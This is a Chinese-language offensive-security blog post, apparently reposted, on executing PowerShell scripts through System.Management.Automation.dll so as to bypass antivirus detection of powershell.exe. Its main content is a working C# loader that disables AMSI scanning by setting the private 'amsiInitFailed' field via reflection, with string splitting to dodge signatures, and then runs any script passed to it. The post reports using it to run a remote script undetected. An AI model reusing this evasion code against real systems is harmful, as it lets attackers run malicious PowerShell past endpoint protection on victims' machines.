None Powershell execute PSCommand
2022-12-19 19:30:49 Author: 仙友道(查看原文) 阅读量:16 收藏

由于杀软对于powershell看管的很严格,实战中想执行ps脚本需要另辟蹊径。
之前将ps命令混淆成这样都被某60拦截,可见已经不是基于正则拦截了。
参考官方链接:
  • https://learn.microsoft.com/en-us/dotnet/api/System.Management.Automation.PowerShell?view=powershellsdk-7.2.0
DLL位于
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
System.Management.Automation.dll是微软提供的一个dll,提供一个简单的接口来执行 powershell 命令:
Powershell.Create().AddScript("get-process").Invoke();
Powershell.exe 实际上是通过System.Management.Automation.dll去完成相关功能的调用,因此在实际渗透过程当中,可以不通过Powershell.exe去执行Powershell脚本。以此来绕过杀软防护。
1.创建Runspace
Runspace MyRunspace = RunspaceFactory.CreateRunspace();
2.定义PipeLine
Pipeline MyPipeline = MyRunspace.CreatePipeline();
3.添加脚本
MyPipeline.Commands.AddScript(script);
4.运行
Collection outputs = MyPipeline.Invoke();
Demo
using System;using System.Collections.ObjectModel;using System.Management.Automation;using System.Management.Automation.Runspaces;using System.Reflection;using System.Text;using System.IO;
namespace Test{ class Program { static void Main(string[] args) { String RunResult = RunScript(args[0]); Console.WriteLine(RunResult);
string RunScript(string script) { Runspace MyRunspace = RunspaceFactory.CreateRunspace(); MyRunspace.Open(); Pipeline MyPipeline = MyRunspace.CreatePipeline(); MyRunspace.GetType().Assembly.GetType("Syste" + "m.Managem" + "ent.Autom" + "ation.AmsiU" + "tils").GetField("am" + "siInitF" + "ailed", BindingFlags.NonPublic | BindingFlags.Static).SetValue(null, true); MyPipeline.Commands.AddScript(script); MyPipeline.Commands.Add("Out-String"); Collection outputs = MyPipeline.Invoke(); MyRunspace.Close(); StringBuilder sb = new StringBuilder(); foreach (PSObject pobject in outputs) { sb.AppendLine(pobject.ToString()); } return sb.ToString(); } } }}
测试截图:
用powershell执行会弹框并拦截,
使用NonePS.exe正常执行远程ps脚本
缺点:
在于自己编译的程序少了powershell拥有的微软签名
如果目标机器不存在DLL,还得上传DLL。

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg3NjYwNDgzMQ==&mid=2247485708&idx=1&sn=8b60d4f2a2143816bb1c27248eeb9f05&chksm=cf2ef5fcf8597cea4b89e73e78dcfabe1e8b929e9909b3f094c006d65e89e4bebe44d3c1db71#rd
如有侵权请联系:admin#unsafe.sh